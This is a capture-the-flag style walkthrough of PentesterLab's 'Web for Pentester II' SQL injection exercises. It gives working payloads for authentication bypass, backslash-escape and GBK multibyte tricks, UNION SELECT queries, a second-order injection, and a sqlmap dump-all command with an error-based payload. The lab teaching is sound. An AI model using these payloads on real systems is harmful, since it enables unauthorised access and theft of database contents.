SQL Injection

The Web for Pentester 2 is a good entry-level hacking challenge for anyone who wants to be a web application pentester. It can be tricky at times, but that is part of the fun! :)

In this walkthrough of PentesterLab’s “Web for Pentester II,” we’ll explore SQL INJECTION 1 - 9 exercises. It’s designed for juniors who interested in learning how to test web applications for security vulnerabilities, specifically focusing on SQL INJEDCTION. Let’s jump in and learn how to navigate these challenges.

Let’s begin by starting “Web for Pentester II,” and navigating to the Example 1 page.

EXERCISE-1

The first example is the most common SQL injection example that you can find. The goal is to bypass the authentication page without submitting any value (password or username).

I Always start using simple tests to determine the technologies. A simple way of archiving this is to submit a string that can cause a processing or parsing error, for example, “’ 1=”

As seen in the error above, the backend is running the following SQL query.

SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]'        

To bypass the authentication page without submitting any value (password or username).

Injecting this payload into the website will give us access without valid credentials.

' or 1=1 --        

After the injection the backend query will be

SELECT * FROM users WHERE username='[USERNAME]' OR 1=1 -- AND password='[PASSWORD]'        

EXERCISE-2

This example is similar to our previous example. Here the web application uses the “Limit” keyword to ensure only one record is returned from the database.

The backend is running the following SQL query.

SELECT * FROM users WHERE username='[USERNAME]' AND password='[PASSWORD]'        

After the injection the backend query will be

SELECT * FROM users WHERE username='[USERNAME]' OR 1=1 LIMIT 1 -- AND password='[PASSWORD]'        

EXERCISE-3

Triggering an SQL error message will now generate a new error. In it, we can see the “’” is now filtered with a backslash, theoretically preventing us from injecting any SQL code.

Since the backslash escapes the next character at a string, we can use this feature to transform this query.

select * from users where username ='username' and password ='password'        

into this query,we can bypass all restrictions and create an injection point at the password field where no filtering occurs.

select * from users where username ='username\' and password ='or 1=1 #'        

Example 4

In the example, the query is sent to the server via URL. This is a bad development practice as this data will be stored in system logs exposing user credentials and allowing the user to access parts of the SQL query.

Since our payload “’ or 1=1 #” is valid, by placing it in the URL the database should return all registered users.

Example-5

By converting this simple SQL query into a union SQL query, we can add a second select to the query, thus allowing us to query the entire database.

The base query is something like:

select id, name from users        

Adding a union select to the end of the query will create a valid query like this:

select id, name from users union select * from users         

Example 6

Similar to our previous exercise, there are at least two ways of listing all registered users. Using the same union select technique as before will give the following result.

Simply We can also delete the group keyword from the URL to remove all restrictions.

Example 7

Now we are presented with an “id=” parameter vulnerable to a SQL injection attack. There are multiple ways of exploiting this parameter, None of those ways is more relaxing than using Sqlmap to do the dirty work.

"Sqlmap" is a command line program that helps detect and exploit SQL injection vulnerabilities. It is an essential tool for any pentester or hacker as it saves us a lot of time guessing and extracting data from databases.

By reading the manual, It is possible to see the most basic command to use is

sqlmap -u 'URL' - dump-all        

This command will tell sqlmap to dump the entire database and decrypt passwords.

Type: error-based (our payload to inject)

Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

Payload: id=1 AND EXTRACTVALUE(5730,CONCAT(0x5c,0x7162627071,(SELECT (ELT(5730=5730,1))),0x7162627a71))

Example 8

This exercise is an example of a second-order SQL injection. A second-order SQL injection is a type of SQL injection that needs two steps to exploit. First, we inject a code that will be stored in the database. Second, we access an endpoint that will incorporate our code into an SQL query and execute it.

In our case, creating a user with our beloved payload “’ or 1=1 #” as a username will store our payload on the database.

To trigger the injection, click on the ID number of the register.

Example 9

It took me a while to understand what was happening here. In this exercise, the PHP page that processes our request is escaping our injection strings by employing the well-known mysql-real-escape-string function.

In our case, the PHP function allows us to insert an escape character from the GBK character set (simplified Chinese). The character will not be escaped by the PHP but will be processed by the database as a “’”.

Using our payload will bypass the authentication process once again.

呵' or 1=1 #